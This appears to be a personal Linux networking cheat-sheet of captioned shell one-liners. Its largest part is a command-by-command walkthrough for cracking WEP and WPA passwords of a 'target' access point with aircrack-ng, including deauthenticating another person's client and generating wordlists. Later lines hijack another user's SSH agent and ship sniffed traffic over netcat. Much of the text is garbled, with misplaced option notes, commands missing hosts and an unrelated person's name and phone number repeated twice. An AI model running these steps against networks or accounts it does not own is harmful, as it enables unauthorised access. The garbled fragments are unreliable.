The Linux Network Book

Table of Contents

last revision
02 September 2016, 1:27pm
book quality


A booklet about networking using the linux operating system.

Wireless Networking ‹↑›

show all network 'interfaces' including wireless ones

 ifconfig -a

show all wireless network interfaces (devices) on the computer


Monitoring wifi connection by watch command (refresh every 3s),

 watch -d -n 3 "iw dev wlan0 station dump; iwconfig wlan0"

scan for available wireless networks using the 'ra0' (ralink) device

 iwlist ra0 scan

list lots of info about available wireless nets from the 'eth1' device

 iwlist eth1 scan | less

list the transmit power information for the 'eth1' wireless interface

 iwlist eth1 txpower

Connecting To A Wireless Network ‹↑›

connect to a wep access point

 iwconfig [interface] mode managed key [WEP key]
 iwconfig [Interface] essid "[ESSID]" (Specify ESSID for the WLAN)
(128 bit WEP use 26 hex characters, 64 bit WEP uses 10)

request IP address, netmask, DNS server and default gateway from the Access Point

 dhclient [interface]

test if the connection worked

  ping  (if you receive a reply you have access)

Wireless Network Security Auditing ‹↑›

The process of attempting to obtain the password for a wireless network may be referred to as a 'security audit' of the network, or more commonly as 'hacking' or 'wardriving'. a step by step guide

find the BSSID (mac address) and channel number of the target

 iwlist ra0 scan

find the ESSID and channel number

 iwlist ra0 scan | grep 'Address\|IE\|SSID\|Frequency'

use kismet to scan for available 802.11 wireless networks

 sudo kismet

Kismet may be a little tricky to configure. What is more, kismet relies apon 'wireshark' (formerly known as 'ethereal') which itself has been known to have security problems.

start collecting packets from the target access point

 sudo airodump-ng -c 1 --bssid 00:24:01:57:2C:43 -w output ra0

mtr - a traceroute ping program
traceroute -
ping -
ifconfig -

Using 'injection' can speed up the process of collecting packets and therefore being able to unencrypt the wifi password. However in many cases it may be possible to unencrypt the password without using injection.

start attempting to decrypt the password using captured packets

 aircrack-ng -b 00:24:01:57:2C:43 output*.cap

options explained
-c 1 - is the channel of the target access point
--bssid - is the mac address or bssid of the target access point
ra0 - is your wireless interface (eg wlan0)
output - a filename prefix for the saving captured packets

-b 00:24:etc:43 - the mac address (or bssid) of the target access pnt
output*.cap - the set of files where capture packets are stored

Wpa Wireless Auditing ‹↑› a guide to wpa wifi auditing the wikipedia page on wpa

show wireless interfaces and devices and chipset

 sudo airmon-ng

disable the 'ath0' wireless interface (device)

 airmon-ng stop ath0

try the following sudo airmon-ng start wlan0 this will start an interface called mon0 etc sudo airodump-ng -w data mon0 collect packets and hopefully handshakes and data from all access points, networks etc Once youve got a handshake (see message below) do sudo aircrack-ng -w dict.txt data*.cap where the dict.txt is a set of words, one of which is hopefully the password for the access point.

The basic technique for wpa wireless auditing is ... - capture the 'handshake' between a station which connects to the wireless access point. This involves either deauthenticating a client or else just waiting until you see

 [ WPA handshake: 00:14:6C:7E:40:80

in the top right corner of the airodump screen. In other words, you just have to wait for someone to log onto their wifi wpa access point. - Try to crack the psk with a dictionary file and brute force. This may take a while and depends on how good you dict file is.

find the access point youre going to have a go at with wifi device 'ra0'

 sudo iwlist ra0 scan | less

put the interface into monitor mode

 sudo airmon-ng start wlan0

A new monitor interface such as 'mon0' will be created. Use this with aircrack-ng to try to grab a handshake.

try to get the authentication handshake. Write data to files 'try...'

 airodump-ng -c 9 --bssid D8:5D:4C:AD:29:E9 -w try ra0
 airodump-ng -c 9 --bssid D8:5D:4C:AD:29:E9 -w try mon0

Substitute in the bssid and channel (-c) you got from iwlist

try to 'deauthenticate' a client (-c) for access point (-a)

 aireplay-ng -0 1 -a D8:5D:4C:AD:29:E9 -c 00:0F:B5:FD:FB:C2 ath0

This basically tries to close someone's wifi connection so that they will log on again, and when they do, you can capture their authentication packets.

wesside -

Cant Start Airodump ‹↑›

Here is another suggestion when airodump returns the following error "ioctl(SIOCSIFFLAGS) failed: Name not unique on network"

This worked!!

First, take the wireless interface down:

 sudo ifconfig wlan0 down
Then, change your wireless card to monitor mode:
 sudo iwconfig wlan0 mode monitor
Next, bring your wireless interface up:
 sudo ifconfig wlan0 up
Then, you can run airodump-ng:
 sudo airodump-ng wlan0

Recover Wpa Password ‹↑›

Once the handshake has been obtained, the task is now 'offline'. No wireless connection is necessary to proceed.

use a word-list file to try to recover the wpa password

 aircrack-ng -w password.lst -b D8:5D:4C:AD:29:E9 try*.cap

or have a go with any network

 sudo aircrack-ng -w dict.txt data*.cap

and a list of possible networks will be presented.

Problems: --------- aircrack-ng says "got no data packets from target network" "No valid wpa handshakes found..." go back to previous step and wait until you see If aircrack-ng produces the message 'No valid WPA handshakes found.. then you need to go back a step to capture the authentication handshake at described above.

use 'john' password auditor to feed passwords to aircrack

delete the capture files if no hanshakes have been found

 (aircrack-ng -w /usr/share/john/password.lst -b 00:24:17:D1:81:C6 ash*.cap | grep 'No valid WPA hanshakes found') && rm -f ash*

Wordlists With Wpa ‹↑›

Each character in the pass-phrase must have an encoding in the range of 32 to 126 (decimal),

To audit or recover a wireless wpa password you need to use a 'dictionary' or wordlist file with the aircrack-ng program. Aircrack-ng tests each password found in the wordlist file against the 'handshake' data captured from a wpa wireless authentication. You may need to create or adapt a wordlist to your particular needs in order to speed up the checking process.

obtain a large wordlist with words in several languages

remove wpa passwords that are too long or too short from 'dict.lst'

 sed -n '/^.\{8,63\}$/p' dict.lst > new.lst

wpa passwords must be between 8 and 63 characters

try cracking the key with a 600K word linux wordlist

 aircrack-ng -w /usr/share/dict/british-english-insane -b D8:5D:4C:AD:29:E9 try*.cap

delete all characters which are not letters, digits or the newline

 cat dict.txt | tr -cd '[:alnum:]\n' > newdict.txt

try to create a wordlist ffrom the content of a webpage (incomplete...)

 lynx -dump | tr -cd '[:alpha:] \n' | tr -s " " | tr ' ' '\n' | less

pipe a bash generated password list to aircrack-ng

 echo ruby{1000..2000} | tr ' ' '\n' | aircrack-ng -w- -b D8:5D:4C:AD:29:E9 try*.cap

remove all punctuation/spaces from 's.lst', uppercase, pipe to aircrack

 tr -dc '[:alnum:]\n' < s.lst | sed 's/.*/\U&/' | aircrack-ng -w- -b D8:5D:4C:AD:29:E9 try*.cap

permute (inflate) dict file 'p.lst', with uppercase and suffixes 0,1,2

 sed 's/.*/&\n\U&\n&0\&1\&2/' p.lst

reduplicate short lines and add 0,1,2 to all, and uppercase

 sed '/^.\{4,6\}$/s//&&/;s/.*/&\n&0\n&1\n&2\n\U&/' < dict.txt

get rid of punctuation, reduplicate short lines, add numbers, uppercase

 tr -dc '[:alnum:]\n'<all.lst | sed '/^.\{4,6\}$/s//&&\n&2011\n&2010\n\L&&/;s/.*/&\n&1\n&2\n&3\n&4\n\U&/' | aircrack-ng -w- -b 94:44:52:0C:F8:4D ash*.cap

The only problem is that its hard to kill this process

Dictionarys For Wpa ‹↑› good info

using the 'john the ripper' utility to generate passwords

 john --stdout --wordlist=specialrules.lst --rules | aircrack-ng -e test -a 2 -w - /root/capture/wpa.cap

ensure all passwords are between 8 and 63 characters

 grep -E '^.{8,63}$' < inputfile

use the small password file in the sources of aircrack

 .. /aircrack-ng-1.2-beta2/test/password.lst

Wordnet ‹↑›

wordnet is a big database of english synonyms and other parts of speech. It may be a useful tool for creating wordlists which can be used to guess ('brute force') WPA wifi passwords.

By combining adjectives with nouns, an interesting password list might be created.

create a large list of english adjectives for aircrack ------- echo "wn "{a..z}" -grepa;" | sort | uniq > adj.lst aircrack-ng -w adj.lst --bssid aa:bb:etc data*.cap ,,,

try create a very large list of english nouns ------- echo "wn "{a..z}{a..z}" -grepn;" | bash | sort | uniq > noun.lst aircrack-ng -w noun.lst --bssid aa:bb:etc data*.cap ,,,

The code above uses the bash 'expansion' feature to create a long series of 'wn nn -grepn' commands. On my system this creates a wordlist of 118204 nouns and requires about 30 seconds to execute

Ip Addresses ‹↑›

An ip address is a unique number which identifies each computer (or really interface to a computer) on a network

get info about remote host ports and os detection

 nmap -sS -P0 -sV -O <target>

list all ip addresses for this computer

 ifconfig | awk '/inet / {print $2}'

get your internal ip address and nothing but your internal ip

 ifconfig $devices | grep "inet addr" | sed 's/.*inet addr:\([0-9\.]*\).*/\1/g'

send the internal IP address by email

 ifconfig en1 | awk '/inet / {print $2}' | mail -s "hello world"

Bandwidth ‹↑›

Bandwidth is the amount of data transfered per second (or other time unit).

Monitor bandwidth by pid

 nethogs -p eth0

Quick key/value display within /proc or /sys

 grep -r . /sys/class/net/eth0/statistics

Delete all aliases for a network interface on a (Free)BSD system

 ifconfig | grep "0xffffffff" | awk '{ print $2 }' | xargs -n 1 ifconfig em0 delete

Using netcat to copy files between servers

 On target: "nc -l 4000 | tar xvf -" On source: "tar -cf - . | nc target_ip 4000"

Routers ‹↑›

Backup your OpenWRT config (only the config)

 curl -d 'username=root&password=your-good-password' "http://router/cgi-bin/luci/admin/system/backup?backup=kthxbye" > `date +%Y%d%m`_config_backup.tgz

Wired Ethernet ‹↑›

Check if network cable is plugged in and working correctly

 mii-tool eth0

Ssh ‹↑›

Ssh is a more secure replace for telnet.

a function for hostname tab-completion with ssh

  autoCompleteHostname() { 
    local hosts; local cur; 
    hosts=($(awk '{print $1}' ~/.ssh/known_hosts | cut -d, -f1));
    COMPREPLY=($(compgen -W '${hosts[@]}' -- $cur ))
  complete -F autoCompleteHostname ssh

ssh autocomplete

 complete -W "$(echo $(grep '^ssh ' .bash_history | sort -u | sed 's/^ssh //'))" ssh

Sshfs ‹↑›

mount an ssh (remote) file system

 sshfs name@server:/path/to/folder /path/to/mount/point

unmount an ssh file system

 fusermount -u ~/sshfs_mounted_directory

Tcp Ports ‹↑›

A port is a concept within the tcp transfer control protocol which allows a machine to make multiple 'socket' connections through a single network interface.

list open tcp/ip ports on the local computer and program name

 netstat -tl
 netstat -tupl

list open tcp/ip ports on the local computer and port number

 netstat -tlnp

show some port info

 lsof -i

find listening ports by pid

 lsof -nP +p 24073 | grep -i listen | awk '{print $1,$2,$7,$8,$9}'

Netcat ‹↑›

Netcat or just 'nc' is considered to be highly useful network tool for copying data to and from network connections. I dont get it really.

tar a directory and send it to netcat

 tar cfvz - /home/user | netcat -l -p 10000

Pinging ‹↑›

Ping can be used to tell if a particular host is 'alive' on the network.

use ping


Ping a URL sending output to file and STDOUT

 ping | tee ping-output.txt

perform a ping sweep of all computers in an ip range

 nmap -sP 192.168.1.*

use a 'tcp' ping (tcp ACK packet) to see if a host is responding

 nmap -PT

use a tcp ping on port 6000 to see if a host is responding

 nmap -PT6000

Configure a 'stateful' firewall to stop these attacks.

Scanning Tcp Ports ‹↑›

It is possible to query all the available tcp ports on the local or a remote computer in order to find out which ports are 'listening' (waiting for a connection)

use tcp-connect to scan common ports on a host for tcp services

 nmap -sT

This is not a 'stealthy' technique since the host will probably log these attempts.

use nmap to scan all possible ports on a host for tcp services

 nmap -sT -p 1-65535

use a 'SYN' scan to scan common ports on a host for tcp services

 nmap -sS

use a 'SYN' scan to scan for open tcp ports on the local computer

 sudo nmap -sS

perform a 'FIN' scan of the tcp ports of a host

 nmap -sF

FIN is normally used to end or destroy a tcp/ip connection

perform a scan of the tcp ports of a host by sending a "NULL" packet

 nmap -sN

Ip Protocol ‹↑›

see what ip protocols are supported on which ports

 sudo nmap -sO

see what ip protocols are running on the local computer

 sudo nmap -sO

Tcp Services ‹↑›

use amap to find out what type of service a port is running


show port numbers for common tcp/ip services

 less /etc/services

Web Servers ‹↑›

This section is not an in depth treatment of the large topic of web servers but only some cursory notes relating to security and trouble shooting. A web server is a potential security hazard, as are all listening tcp services.

check whether the apache webserver is currently running

 sudo service apache2 status

restart the apache server

 sudo apache2ctl restart

stop apache from automatically starting at boot time (ubuntu)

 sudo chkconfig apache2 off

show all loaded apache modules

 apache2ctl -M

For the sake of security its a good idea to check your log files to see how people are trying to break into your computer via the webserver

view the latest apache access log

 less /var/log/apache2/access.log

check all the apache log files, but not necessarily in the right order

 zcat /var/log/apache2/access.log.* | less

check all apache log files except your own activities

 zcat /var/log/apache2/access.log.* | grep -v '' | less

what who is using tcp port 80

 watch lsof -i :80
 lsof -i :80

Telnet ‹↑›

scans for open ports using telnet

 HOST=;for((port=1;port<=65535;++port)); do echo -en "$port ";if echo -en "open $HOST $port\nlogout\quit" | telnet 2>/dev/null | grep 'Connected to' > /dev/null; then echo -en "\n\nport $port/tcp is open\n\n";fi;done | grep open

Miscelaneous ‹↑›

How to establish a remote Gnu screen session

 ssh -t /usr/bin/screen -xRR

Check a server is up. If it isn't mail me.

 ping -q -c1 -w3 2&>1 /dev/null || echo ping failed | mail -ne -s'Server unavailable'

Copy specific files to another machine, keeping the file

 tar cpfP - $(find <somedir> -type f -name *.png) | ssh user@host | tar xpfP -

Graph # of connections for each hosts.

 netstat -an | grep ESTABLISHED | awk '{print $5}' | awk -F: '{print $1}' | sort | uniq -c | awk '{ printf("%s\t%s\t",$2,$1) ; for (i = 0; i < $1; i++) {printf("*")}; print "" }'

How to run a command on a list of remote servers read from a file

 while read server; do ssh -n user@$server "command"; done < servers.txt

find all active IP addresses in a network

 nmap -sP 192.168.0.*

connect via ssh using mac address

 ssh root@`for ((i=100; i<=110; i++));do arp -a 192.168.1.$i; done | grep 00:35:cf:56:b2:2g | awk '{print $2}' | sed -e 's/(//' -e 's/)//'`

autossh + ssh + screen = super rad perma-sessions

 AUTOSSH_POLL=1 autossh -M 21010 hostname -t 'screen -Dr'

determine if tcp port is open

 nc -zw2 80 && echo open

Block an IP address from connecting to a server

 iptables -A INPUT -s -j DROP

Create an SSH SOCKS proxy server on localhost:8000 that will

 autossh -f -M 20000 -D 8000 somehost -N

Measures download speed on eth0

 while true; do X=$Y; sleep 1; Y=$(ifconfig eth0|grep RX\ bytes|awk '{ print $2 }'|cut -d : -f 2); echo "$(( Y-X )) bps"; done

Show which programs are listening on TCP and UDP ports

 netstat -plunt

Resume an aborted scp file transfers

 rsync --partial --progress --rsh=ssh SOURCE DESTINATION

get all the data about your IP configuration across all network

 ipconfig /all

Get your public ip address

 python -c "import socket; s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect(('', 80)); print s.getsockname()[0]"

Informations sur les connexions reseau

 netstat -taupe

Get all IPs via ifconfig

 ifconfig | grep "inet [[:alpha:]]\+" | cut -d: -f2 | cut -d' ' -f2

See a list of ports running

 netstat -an | grep -i listen

Periodically loop a command

 while true; do ifconfig eth0 | grep "inet addr:"; sleep 60; done;

Graphical display of wireless links


See smbstatus all the time

 while (( $i != 0 )) { smbstatus; sleep 5; clear }

Number of open connections per ip.

 netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

Snmpwalk a hosts's entire OID tree with SNMP V3

 snmpwalk -v3 -On -u <user> -l NoAuthNoPriv -m ALL <HOST_IP> .

Snmpwalk a hosts's entire OID tree with SNMP V3 with SHA

 snmpwalk -v3 -On -u <user> -l AuthNoPriv -a SHA -A <auth_password> -m ALL <HOST_IP> .

Creates a proxy based on tsocks.

 alias tproxy='ssh -ND 8118 user@server&; export LD_PRELOAD="/usr/lib/"'

Ping a range of addresses

 nmap -sP -T Insane

Connect to remote machine with other encoding charset

 LC_ALL=fr_FR luit ssh root@remote_machine_ip

NICs, IPs, and Mac

options explained
-0 - means deauthentication
1 - the number of deauths to send (you can send multiple if you wish)
-a 00:14:6C:7E:40:80 is the MAC address of the access point
-c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
ath0 - is the interface name

Show what 'process id' (pid) is listening on port 80 on Linux

 netstat -alnp | grep ::80

Simple way to envoke a secure vnc session through ssh enabled

 vncviewer -via

Transfer SSH public key to another machine in one step

 ssh-keygen; ssh-copy-id user@host; ssh user@host

live ssh network throughput test

 yes | pv | ssh $host "cat > /dev/null"

check open ports

 lsof -Pni4 | grep LISTEN

Display current bandwidth statistics

 ifstat -nt

Remotely sniff traffic and pass to snort

 sniff_host: tcpdump -nn -i eth1 -w - | nc 666

Proxy all web traffic via ssh

 Putty -d 8080 [server]

Multiple SSH Tunnels

 ssh -L :: -L :: @

Monitor TCP opened connections

 watch -n 1 "netstat -tpanl | grep ESTABLISHED"

Sort dotted quads

 sort -nt . -k 1,1 -k 2,2 -k 3,3 -k 4,4

count IPv4 connections per IP

 netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | sed s/::ffff:// | cut -d: -f1 | sort | uniq -c | sort -n

analyze traffic remotely over ssh w/ wireshark

 ssh 'tshark -f "port !22" -w -' | wireshark -k -i -

bkup the old files

 find <dir> -type f -mtime +<days> -exec scp -r {} user@backuphost:/data/bkup \;

Use dig instead of nslookup


Get your external IP address

 html2text | grep -i 'Current IP Address:'|cut

Connect to irssi over ssh

 rxvt-unicode -g 999x999 -sr -depth 32 -bg rg-ba:0000/0000/0000/dddd +sb -T irssi -n irssi -name irssichat -e ssh -Xt screen -aAdr -RR irssi irssi

Read just the IP address of a device

 /sbin/ifconfig | grep inet | cut -f 2 -d ":" | cut -f 1 -d " " |egrep -v "^$"

Read just the IP address of a device

 /sbin/ifconfig | grep inet | cut -f 2 -d ":" | cut -f 1 -d " "

Adhoc tar backup

 tar -cvzf - /source/path | ssh <targethostname> -l <username> dd of=/destination/path/backupfile.tgz

List open sockets protocol/address/port/state/PID/program name

 sudo netstat -punta

The simplest way to transport information over a network

 (on destination machine) nc -l 1234 > whatever; (on source machine) nc destination 1234 < whatever;

Ride another SSH agent

 export SSH_AUTH_SOCK=`find /tmp/ssh* -type s -user [user] -mtime -1 | head -1`

Validate openssh key & print checksum

 ssh-keygen -l -f [pubkey] | awk '{print $2}' | tr -ds ':' '' | egrep -ie "[a-f0-9]{32}"

department of education contact: scott mitchell, tel: 03 6212 3225, mail: a person who knows about teachers aide

department of education contact: scott mitchell, tel: 03 6212 3225, mail: a person who knows about teachers aide

 ifconfig -a | nawk 'BEGIN {FS=" "}{RS="\n"}{ if($1~ /:/) {printf "%s ", $1}}{ if($1=="inet") {print " -- ",system("arp "$2)}}'|egrep -v "^[0-9]$"